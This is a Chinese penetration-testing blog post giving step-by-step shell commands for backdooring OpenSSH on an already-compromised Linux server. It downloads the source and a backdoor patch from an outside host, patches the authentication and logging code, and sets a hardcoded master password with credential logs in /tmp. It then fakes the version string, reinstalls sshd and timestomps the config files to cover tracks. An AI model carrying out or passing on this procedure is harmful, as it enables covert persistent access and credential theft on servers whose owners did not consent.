Menu

Linux渗透之openSSH后门

2015-08-10 - Linux渗透, Linux运维安全, 渗透测试

首先拿下服务器shell权限,其次利用各种方式提下root!

拿下root之后才是开始:

1.首先查看ssh版本:

[email protected]:~# ssh -V
OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013

 

2.下载SSH 源码包

[email protected]:~#wget http://www.k2a.cn/Tools/open.tar.gz                   (源码包)

[email protected]:~#wget http://www.k2a.cn/Tools/patch.tar.gz                 (后门文件)

3.备份原有ssh配置文件

[email protected]:~#cp -p /etc/ssh/sshd_config{,.bak}

4.编译安装

[email protected]:~# tar -xzvf open.tar.gz

[email protected]:~# tar -zxvf patch.tar.gz

[email protected]:~# cd openssh-5.9p1.patch/

[email protected]:/openssh-5.9p1.patch# cp sshbd5.9p1.diff ../openssh-5.9p1

[email protected]:/openssh-5.9p1.patch# cd ../openssh-5.9p1

[email protected]:/openssh-5.9p1# patch < sshbd5.9p1.diff
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.hxiu

5.设置后门密码warden 以及路径任意
[email protected]:/openssh-5.9p1# vim includes.h
#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "warden"

6.修改ssh的版本

[email protected]:/openssh-5.9p1# vim version.h
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE

7.编译安装

[email protected]:/openssh-5.9p1# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5

[email protected]:/openssh-5.9p1# make && make install

[email protected]:/etc/ssh# touch -r sshd_config.bak ssh_config

[email protected]:/etc/ssh# service sshd reload

8.常见问题

可能需要安装以下软件

openssl openssl-devel pam pam-devel zlib-devel

 

08085